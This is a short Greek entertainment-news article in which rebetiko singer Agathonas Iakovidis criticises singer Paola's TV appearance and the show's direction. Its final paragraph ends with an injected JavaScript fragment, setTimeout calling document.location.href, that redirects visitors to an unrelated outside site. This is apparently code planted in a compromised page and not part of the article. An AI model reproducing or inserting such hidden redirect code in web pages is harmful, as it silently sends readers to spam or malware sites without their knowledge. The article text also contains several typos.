Αγάθωνας κατά Πάολας: Στο δικό της είδος είναι πάρα πολύ καλή, αλλά…

0
18

Tην «οργή» του γνωτού ακλλιτέχνη Αγάθωνα Ιακωβίδη, προκάλεσε η εμφάνιση της Πάολας στην εκπομπή του Σπύρου Παπαδόπουλου στον τηλεοπτικόσ ταθμό Alpha.

Ο Αγάθωνας μιλώντας στο Epsilon TV, σημείωσε ότι «σε αυτή τη χώρα όλοι νομίζουν ότι μπορούν να υποστηρίξουν τα πάντα. Η Πάολα στο είδος της είναι πάρα πολύ καλή. Δεν είναι βέβαια ένα είδος που μου αρέσει εμένα για να πω ότι την παρακολουθώ. […] Τώρα έχει γίνει ένας αχταρμάς στην Ελλάδα και όλοι τα λένε όλα».

Παράλληλα, ο Αγάθωνας Ιακωβίδης άσκησε κριτική και στο περιεχόμενο της εκπομπής, λέγοντας ότι «η συγκεκριμένη εκπομπή που πήγε πάει από το κακό στο χειρότερο από επιλογή προσώπων. Αλλιώς ξεκίνησε, αλλιώς κατέληξε. Εγώ εδώ και κάποια χρόνια δεν πηγαίνω συνειδητά. Με έχουν πάρει πολλές φορές, τους είπα ότι δεν θέλω να ξαναβγώ -πάνω από 5-6 χρόνια. Για τους δικούς μου λόγους τους είπα ότι δεν θέλω να με ξαναενοχλήσουν. Αν άκουγα την Πάολα να ερμηνεύει ρεμπέτικα θα γελούσα. Στο δικό της είδος είναι πάρα πολύ καλή, δεν μπορεί όμως να πει άλλα πράγματα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here